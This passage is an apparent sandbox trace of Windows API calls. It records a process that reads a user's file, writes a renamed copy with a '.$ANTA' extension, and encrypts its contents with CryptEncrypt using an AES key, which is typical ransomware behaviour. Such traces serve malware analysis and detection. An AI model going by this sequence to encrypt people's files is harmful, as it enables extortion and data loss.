dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0106.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0106.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8388 [0106.702] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx")) returned 0x10 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8388 | out: hHeap=0x1780000) returned 1 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0106.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7e48 | out: hHeap=0x1780000) returned 1 [0106.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0106.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0106.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0106.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0106.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0106.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0106.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\u5YsBEddaGYJI-.swf.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\u5ysbeddagyji-.swf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0106.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0106.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0106.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0106.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0106.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0106.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0106.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0106.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0106.703] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0106.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0106.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0106.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0106.704] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0106.704] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0106.704] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0106.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0106.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0106.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0106.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0106.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0106.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0c020 [0106.707] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0106.707] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0xd19f, lpOverlapped=0x0) returned 1 [0106.709] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0106.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0106.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0106.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0106.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0106.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd19f) returned 0x4516010 [0106.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0c020 | out: hHeap=0x1780000) returned 1 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0106.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0106.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd19f) returned 0x45231b8 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0106.712] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0106.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0106.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0106.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0106.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0106.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd19f) returned 0x4516010 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0106.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0106.712] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0106.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0106.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0106.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0106.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0106.713] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0106.713] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0106.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0106.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a70 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd19f) returned 0x4516010 [0106.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2970 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0106.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a60 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0106.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2960 [0106.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0106.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caca0 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd19f) returned 0x4530360 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0106.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0106.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0106.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0106.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0106.715] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.715] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0106.715] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0106.715] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0106.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d02d8 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0558 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0106.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0106.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0106.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0106.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0106.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0106.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0106.717] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2c50, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2c50*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0106.718] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0106.718] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0106.718] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0106.718] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0106.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cafa0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0106.718] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0xd19f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0xd1a0) returned 1 [0106.718] CharLowerBuffW (in: lpsz="byte[53665]", cchLength=0xb | out: lpsz="byte[53665]") returned 0xb [0106.718] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.718] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0106.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0106.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb0d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0106.719] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453d508*, pdwDataLen=0x144de30*=0xd19f, dwBufLen=0xd1a0 | out: pbData=0x453d508*, pdwDataLen=0x144de30*=0xd1a0) returned 1 